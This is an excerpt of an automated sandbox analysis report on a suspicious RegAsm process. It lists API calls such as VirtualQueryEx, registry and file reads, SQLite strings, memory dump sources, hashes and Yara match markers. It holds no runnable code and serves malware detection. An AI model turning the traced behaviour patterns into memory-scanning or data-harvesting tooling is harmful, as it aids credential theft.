                                              • CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN), xrefs: 1B6A1E2C
                                              • no such database: %s, xrefs: 1B6A1E05
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN)$no such database: %s
                                              • API String ID: 0-1404816483
                                              • Opcode ID: d96a2139f8aad6b3d8540454a56b14df3c0d998af1c3e960a9c4420a217e18f9
                                              • Instruction ID: d479939a7fc26553fdf73153ec0dcd25209bd77237d445cc94070edd831299d5
                                              • Opcode Fuzzy Hash: d96a2139f8aad6b3d8540454a56b14df3c0d998af1c3e960a9c4420a217e18f9
                                              • Instruction Fuzzy Hash: 873136B5601309ABCB105F7AEC41BDBB7D8FF92261F000169FD5897240EA76E80087E1
                                              APIs
                                              • strlen.MSVCRT ref: 00410184
                                              • ??_U@YAPAXI@Z.MSVCRT ref: 004101A5
                                                • Part of subcall function 0040FFBE: strlen.MSVCRT ref: 0040FFCA
                                                • Part of subcall function 0040FFBE: strlen.MSVCRT ref: 0040FFE0
                                                • Part of subcall function 0040FFBE: strlen.MSVCRT ref: 00410079
                                              • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,00000000,?,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF), ref: 004101D2
                                              • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 0041029C
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 004102AD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: strlen$QueryVirtual
                                              • String ID: @
                                              • API String ID: 3099930812-2766056989
                                              • Opcode ID: ed0060925190887529a7005716ec5ae67a287d2f756f91219cf10def04ef4a31
                                              • Instruction ID: 6369093116528879ce7ac296ed84e42a6f2290047d72d499b57dbda31d52bc8e
                                              • Opcode Fuzzy Hash: ed0060925190887529a7005716ec5ae67a287d2f756f91219cf10def04ef4a31
                                              • Instruction Fuzzy Hash: 2C419F71A00109EFDF10DF91DD49AEE7BB6EF48314F14806AF904A2150D7798E908BA8
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0041274A
                                              • strtok_s.MSVCRT ref: 00412775
                                              • StrCmpCA.SHLWAPI(00000000,004276D4,00000001,?,?,?,00000000), ref: 004127B8
                                              • StrCmpCA.SHLWAPI(00000000,004276D0,00000001,?,?,?,00000000), ref: 004127E6
                                              • StrCmpCA.SHLWAPI(00000000,004276CC,00000001,?,?,?,00000000), ref: 0041280B
                                              • StrCmpCA.SHLWAPI(00000000,004276C8,00000001,?,?,?,00000000), ref: 0041283C
                                              • strtok_s.MSVCRT ref: 00412872
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: strtok_s$H_prolog
                                              • String ID:
                                              • API String ID: 1158113254-0
                                              • Opcode ID: ed552e791d81dc94fde04f444568443972d745201ce8858a057a31f820a0ff22
                                              • Instruction ID: 2ee770e07d530aa2307f59e79d679cd3bebeaaa1e97602db57672fb824a5794a
                                              • Opcode Fuzzy Hash: ed552e791d81dc94fde04f444568443972d745201ce8858a057a31f820a0ff22
                                              • Instruction Fuzzy Hash: E041A171B00206ABCB18DF65CE85BEAB7E8EB14315F10162FE005E6591E7BCCAD5CB58
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6B9CF1
                                              • %s at line %d of [%.10s], xrefs: 1B6B9D00
                                              • misuse, xrefs: 1B6B9CFB
                                              • API called with finalized prepared statement, xrefs: 1B6B9CE5
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                              • API String ID: 0-3620335220
                                              • Opcode ID: ade507dd2250ac42534cfb690feaa120a9035d82e5d447f72e580b8be3b816ff
                                              • Instruction ID: 033617891400c0ae7183b3d616cd05899c22d7eb6be897d10267e046ff4c476a
                                              • Opcode Fuzzy Hash: ade507dd2250ac42534cfb690feaa120a9035d82e5d447f72e580b8be3b816ff
                                              • Instruction Fuzzy Hash: 57113DE6F01A1566DE116B29BC45BCE7268AFE196BF010039F94596340E610B88593F2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9ca2ddd6a58d634c0b9c1e508c56339805a780fbb1fe01a518e5dcdf439ec8de
                                              • Instruction ID: 7bea0675ae15a851f9a6affe9bd8fc438fb346f08990f97a234a21dd04770434
                                              • Opcode Fuzzy Hash: 9ca2ddd6a58d634c0b9c1e508c56339805a780fbb1fe01a518e5dcdf439ec8de
                                              • Instruction Fuzzy Hash: B7F1E671A043419FD721CF24D4C07EABBE0BF44226F46466DF8958B362D735E9858B92
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 004170D9
                                              • memset.MSVCRT ref: 00417105
                                              • RegOpenKeyExA.ADVAPI32(80000001,00000000,00020119,?,?,?,00000000), ref: 00417122
                                              • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF,?,?,00000000), ref: 00417142
                                              • lstrcat.KERNEL32(?,?), ref: 00417171
                                              • lstrcat.KERNEL32(?), ref: 00417184
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$H_prologOpenQueryValuememset
                                              • String ID:
                                              • API String ID: 2333602472-0
                                              • Opcode ID: d9373126e1dc138c3136be61258351eef7578349bc004157723a4198b47a7ae2
                                              • Instruction ID: 165c64955ada5dd690f82560ae2227265157eda90b096ca655810e6d6b2df996
                                              • Opcode Fuzzy Hash: d9373126e1dc138c3136be61258351eef7578349bc004157723a4198b47a7ae2
                                              • Instruction Fuzzy Hash: F1417DB184021DABDF00EFA1DC46EDE7B7DEB09304F00056AF604A2151E7359B998FE6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master
                                              • API String ID: 0-231581592
                                              • Opcode ID: b926b54970eebb296d070ff22510e70e1b0f1df4b4a7de8723fc93aa8542953c
                                              • Instruction ID: 66c30eb03fc79dd43c8185add7331d7977b48eb46bfd76847db15d7f15bafb06
                                              • Opcode Fuzzy Hash: b926b54970eebb296d070ff22510e70e1b0f1df4b4a7de8723fc93aa8542953c
                                              • Instruction Fuzzy Hash: 10E1F5B0A043429FD711CF24D981B9AFBE4BF95708F08452CF99597251E771E984CF92
                                              APIs
                                              • __lock.LIBCMT ref: 0041C155
                                                • Part of subcall function 0041AB33: __mtinitlocknum.LIBCMT ref: 0041AB49
                                                • Part of subcall function 0041AB33: __amsg_exit.LIBCMT ref: 0041AB55
                                                • Part of subcall function 0041AB33: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041B7A1,0000000D,?,?,0041BBF5,0041A692,?,?,0041979B,00000000,0042DED0,004197E2,?), ref: 0041AB5D
                                              • DecodePointer.KERNEL32(0042DE58,00000020,0041C298,00000000,00000001,00000000,?,0041C2BA,000000FF,?,0041AB5A,00000011,00000000,?,0041B7A1,0000000D), ref: 0041C191
                                              • DecodePointer.KERNEL32(?,0041C2BA,000000FF,?,0041AB5A,00000011,00000000,?,0041B7A1,0000000D,?,?,0041BBF5,0041A692), ref: 0041C1A2
                                                • Part of subcall function 0041B71A: EncodePointer.KERNEL32(00000000,0041F2EC,00641458,00000314,00000000,?,?,?,?,?,0041C4AF,00641458,Microsoft Visual C++ Runtime Library,00012010), ref: 0041B71C
                                              • DecodePointer.KERNEL32(-00000004,?,0041C2BA,000000FF,?,0041AB5A,00000011,00000000,?,0041B7A1,0000000D,?,?,0041BBF5,0041A692), ref: 0041C1C8
                                              • DecodePointer.KERNEL32(?,0041C2BA,000000FF,?,0041AB5A,00000011,00000000,?,0041B7A1,0000000D,?,?,0041BBF5,0041A692), ref: 0041C1DB
                                              • DecodePointer.KERNEL32(?,0041C2BA,000000FF,?,0041AB5A,00000011,00000000,?,0041B7A1,0000000D,?,?,0041BBF5,0041A692), ref: 0041C1E5
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                              • String ID:
                                              • API String ID: 2005412495-0
                                              • Opcode ID: 9389fa439de07799668fa6fb7528059da46850322112382c7e99f1ad758988c3
                                              • Instruction ID: 203bb53f675d54a00f5d095d39f2d5c99d881e12e20759b04b54da32f8966848
                                              • Opcode Fuzzy Hash: 9389fa439de07799668fa6fb7528059da46850322112382c7e99f1ad758988c3
                                              • Instruction Fuzzy Hash: B8311470E802099FDF50AFE9DC856DDBAF1BB0A355F10806BE410A6291DBBC4995CF29
                                              APIs
                                              • __getptd.LIBCMT ref: 0041AF2C
                                                • Part of subcall function 0041B884: __getptd_noexit.LIBCMT ref: 0041B887
                                                • Part of subcall function 0041B884: __amsg_exit.LIBCMT ref: 0041B894
                                              • __amsg_exit.LIBCMT ref: 0041AF4C
                                              • __lock.LIBCMT ref: 0041AF5C
                                              • InterlockedDecrement.KERNEL32(?), ref: 0041AF79
                                              • _free.LIBCMT ref: 0041AF8C
                                              • InterlockedIncrement.KERNEL32(0042F1C0), ref: 0041AFA4
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                              • String ID:
                                              • API String ID: 3470314060-0
                                              • Opcode ID: 1e827ee23bb3e70df1e41bae06209c6c91ac37d3c5e2f83c72171efd40aa22ae
                                              • Instruction ID: d100412c1c456c158b61082d17fa93871d043b47f49655a41b741997180fc20d
                                              • Opcode Fuzzy Hash: 1e827ee23bb3e70df1e41bae06209c6c91ac37d3c5e2f83c72171efd40aa22ae
                                              • Instruction Fuzzy Hash: 74013071A02621ABC621AF559805BDA7370AF00715F94802BF81467291C73C5DE7CADF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                              • API String ID: 0-2528248365
                                              • Opcode ID: 1f0460a096904fc8b57d36d0f9cb74fb13e43c7e084e121356507854941f35ba
                                              • Instruction ID: 81400fb89c83055ce4de48d748b25f880db356b2186dfa7e8048055abd113b95
                                              • Opcode Fuzzy Hash: 1f0460a096904fc8b57d36d0f9cb74fb13e43c7e084e121356507854941f35ba
                                              • Instruction Fuzzy Hash: FF61F1B5B042018FCB04DF28D880A9BB7E5FB9D714F0605A9EC899B312E771E844CBA1
                                              Strings
                                              • unable to delete/modify user-function due to active statements, xrefs: 1B78AD61
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B78AE0E
                                              • %s at line %d of [%.10s], xrefs: 1B78AE1D
                                              • misuse, xrefs: 1B78AE18
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
                                              • API String ID: 0-3864549341
                                              • Opcode ID: 2c94d6c5ccc810158f65a12e2a71f1f94adabd8831423de92ee5b59ff129eb55
                                              • Instruction ID: 2fe782e8abf77da662422775982e2276f9c83ad5146715f7d0360a1a26d89b37
                                              • Opcode Fuzzy Hash: 2c94d6c5ccc810158f65a12e2a71f1f94adabd8831423de92ee5b59ff129eb55
                                              • Instruction Fuzzy Hash: 9651E172604701AFD710AE24DC81BAFB7F9FF89715F04492DF686D6250E332E8419B62
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0040BE7A
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
                                                • Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
                                                • Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
                                                • Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
                                                • Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
                                                • Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E
                                                • Part of subcall function 00411B55: LocalAlloc.KERNEL32(00000040,?,000000C8,00000001,?,00413F3B,00000000,00000000), ref: 00411B6E
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00426F88,00426C9A), ref: 0040BF3B
                                              • lstrlenA.KERNEL32(00000000), ref: 0040BF57
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 0040BC44: _EH_prolog.MSVCRT ref: 0040BC49
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
